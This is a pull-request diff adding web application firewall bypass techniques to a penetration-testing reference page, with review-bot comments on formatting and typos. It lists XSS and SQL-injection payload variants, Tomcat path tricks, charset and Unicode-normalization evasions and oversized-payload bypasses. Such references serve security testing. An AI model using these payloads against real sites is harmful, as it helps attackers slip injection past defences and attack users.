Merge pull request #649 from ally-petitt/master
Clean up and add additional WAF bypass techniques to waf-bypass.md
This commit is contained in: commit a2c9c0e50c
@ -12,13 +12,36 @@
</details>
## Regex Bypasses
Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks,
and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)
and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
## Charset Encoding
```bash
# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
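Review bot: the two Tomcat lines sitting between the closing ``` after the `<BODY onload...>` entry and the `## Charset Encoding` heading (`# Path blacklist bypass - Tomcat` and `/path1/path2/ == ;/path1;foo/path2;bar/;`) are outside any code fence, so Markdown renders the first as a top-level heading and the second as a bare paragraph; the same two lines appear inside the fenced `## Obfuscation` block added in the next hunk, so drop these copies (or wrap them in a fence if they are meant to stay here). While in this block, fix the comment typos `Clasic` -> `Classic`, `parenetheses` -> `parentheses` and `malicous.com` -> `malicious.com`, and reconsider the label on `<iframe src="javascript:alert(`xss`)"> #unicode encoding`: the payload contains no Unicode escaping, it is just the backtick call form that the earlier `alert`XSS`` entry already covers, so either substitute a genuinely encoded payload or relabel it.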
@ -38,6 +61,30 @@ Content-Length: 61
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
```
## Obfuscation
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
## Unicode Compatability
Depending on the implementation of Unicode normalization (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that share Unicode
compatability may be able to bypass the WAF and execute as the intended payload. Compatible characters can be found [here](https://www.compart.com/en/unicode)
### Example
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥ --> <img src=p onerror='prompt(1)'>
```
## Exceeding Size Limitations
It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
<details>
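Review bot: `## Unicode Compatability` and `compatability` in the paragraph below it should read `Compatibility`, and the sentence ending `Compatible characters can be found [here](https://www.compart.com/en/unicode)` is missing its full stop. The new `## Obfuscation` block repeats `# IIS, ASP Clasic` / `<%s%cr%u0131pt> == <script>`, which is already the first entry of the `## Regex Bypasses` block in the previous hunk; keep one copy and correct `Clasic` -> `Classic` in whichever stays. The NFKD example would also benefit from one sentence making explicit what `Depending on the implementation of Unicode normalization` only hints at: the substitution only pays off when the application normalizes the input after the WAF has already inspected the un-normalized form.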